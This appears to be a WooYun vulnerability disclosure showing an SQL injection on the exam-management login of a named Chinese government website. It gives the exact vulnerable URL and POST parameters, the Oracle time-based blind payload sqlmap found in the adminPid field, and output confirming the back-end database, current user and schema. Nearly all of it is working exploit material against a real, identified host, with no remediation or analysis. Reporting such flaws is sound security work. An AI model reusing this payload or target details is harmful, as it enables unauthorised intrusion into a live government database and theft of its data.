WooYun.org

注入点:
http://www.cqczkj.gov.cn:8081/cq-eams/Actions/Net/Internal/WebUserLoginAction.do;JSESSIONID2=vdyWV1QK8PCYkny2vj96CxSYDqvbyTsyWpQjnxbdyvGVpNkhGM2y!-581403971?method=CompExamLoginOn&&printPassedCert=true
printPassedCert=true&userID=88952634&userPwd=88952634&cmd_next=%EF%BF%BD%E1%BD%BB&examMainPid=88952634&certType=88952634&adminPid=88952634
sqlmap identified the following injection points with a total of 1222 HTTP(s) re
quests:
---
Place: POST
Parameter: adminPid
Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: printPassedCert=true&userID=88952634&userPwd=88952634&cmd_next=%EF%
BF%BD%E1%BD%BB&examMainPid=88952634&certType=88952634&adminPid=88952634' AND 537
6=DBMS_PIPE.RECEIVE_MESSAGE(CHR(76)||CHR(97)||CHR(119)||CHR(71),5) AND 'jJJN'='j
JJN
---
[11:53:04] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP, JSP 2.1
back-end DBMS: Oracle
[11:53:04] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 59 times
[11:53:04] [INFO] fetched data logged to text files under 'E:\Python27\cls\outpu
t\www.cqczkj.gov.cn'
[*] shutting down at 11:53:04
current user: 'CQEAMS'
[12:05:35] [INFO] fetching current database
[12:05:35] [INFO] resumed: CQEAMS
current schema (equivalent to database on Oracle): 'CQEAMS'